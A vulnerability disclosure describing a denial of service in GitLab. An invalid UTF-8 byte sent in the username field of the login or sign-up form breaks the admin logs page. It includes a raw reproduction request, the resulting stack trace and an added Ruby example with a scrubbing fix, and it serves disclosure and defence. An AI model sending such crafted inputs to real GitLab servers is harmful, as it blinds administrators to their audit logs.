[GITLAB] — Denial of service via “Login Panel” functionality.

Lyubomir Tsirkov
2 min read, Feb 12, 2021

After reporting the SSRF issues, I proceeded to explore the application. It was only a matter of time before I discovered something else … A few hours later I identified a “Denial of Service” vulnerability that could be leveraged by an attacker in such a manner as to block the administrator’s access to the “Log Audit Page”.

At first, the vulnerability could be exploited only as an authenticated user. Then I noticed that the login form suffered from the same issue, so it wasn’t mandatory to use a user account.

Steps to reproduce:

  1. Append an invalid UTF-8 character to the username field and forward the request:

POST /users HTTP/1.1
Host: 192.168.199.243
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.199.243/users/sign_in
Content-Type: application/x-www-form-urlencoded
Content-Length: 313
Connection: close
Cookie: sidebar_collapsed=false; convdev_intro_callout_dismissed=true; _gitlab_session=0bf82601779beb3b2508af113e208049; event_filter=all; hide_auto_devops_implicitly_enabled_banner_12=false
Upgrade-Insecure-Requests: 1
utf8=%E2%9C%93&authenticity_token=MaS%2B21c7gMU6teJMur43ILwFU6KJetpGDgPIqIwbWDtbPOniGMmZasElptpXoimFLkAzotv5Df2Mvytbz9tUPQ%3D%3D&new_user%5Bname%5D=TESTDOS&new_user%5Busername%5D=TEESTDOS&new_user%5Bemail%5D=TESTDOS%40abv.bg&new_user%5Bemail_confirmation%5D=TESTDOS%40abv.bg&new_user%5Bpassword%5D=TESTDOS%40abv.bg

  2. Log in as Administrator and go to “Logs Page” in the Admin panel.
  3. You won’t be able to open “Logs Page”.

The following page was shown:

The following error was triggered on the back-end.

ActionView::Template::Error (invalid byte sequence in UTF-8):
    21: Scroll down
    22: .file-content.logs
    23:   %ol
    24:     - klass.read_latest.each do |line|
    25:       %li
    26:         %p= line
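The failure mode behind that trace, as an added example (not GitLab's code): a log viewer that HTML-escapes each line with a regex raises ArgumentError on the first line holding an invalid UTF-8 byte, and String#scrub is one way to keep the page rendering. The sample log lines are constructed.

```ruby
# Added example (not GitLab's code): reproduces the failure mode described
# above and shows a defensive fix. A log viewer that prints each line
# through a gsub-based HTML escaper (as the helper behind HAML's `=` does)
# raises ArgumentError as soon as one line carries an invalid UTF-8 byte.

# Constructed sample lines standing in for the tail of an audit log. The
# second one carries a stray 0xFF byte, which is never valid in UTF-8, so
# Ruby tags the literal as UTF-8 but valid_encoding? is false.
SAMPLE_LOG = [
  "Started POST \"/users\" for 192.168.199.243",
  "Parameters: {\"username\"=>\"TEESTDOS\xFF\"}",
  "Completed 200 OK",
].freeze

HTML_ESCAPE = { '&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
                '"' => '&quot;', "'" => '&#39;' }.freeze

# Regex-based escaping. Matching a regex against a string whose bytes are
# invalid in its encoding raises "invalid byte sequence in UTF-8"; inside a
# view that surfaces as ActionView::Template::Error.
def html_escape(line)
  line.gsub(/[&<>"']/, HTML_ESCAPE)
end

# Naive viewer: one bad line aborts the whole page (the observed DoS).
def render_log_naive(lines)
  lines.map { |line| "<li><p>#{html_escape(line)}</p></li>" }
end

# Hardened viewer: String#scrub replaces each invalid byte with U+FFFD
# before escaping, so every line renders and the bad byte stays visible.
def render_log_scrubbed(lines)
  lines.map do |line|
    safe = line.valid_encoding? ? line : line.scrub("\uFFFD")
    "<li><p>#{html_escape(safe)}</p></li>"
  end
end

if $PROGRAM_NAME == __FILE__
  begin
    render_log_naive(SAMPLE_LOG)
  rescue ArgumentError => e
    puts "naive viewer failed: #{e.message}"
  end
  puts render_log_scrubbed(SAMPLE_LOG)
end
```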

Impact

The administrator won’t be able to see any logs through the GitLab administrative panel.
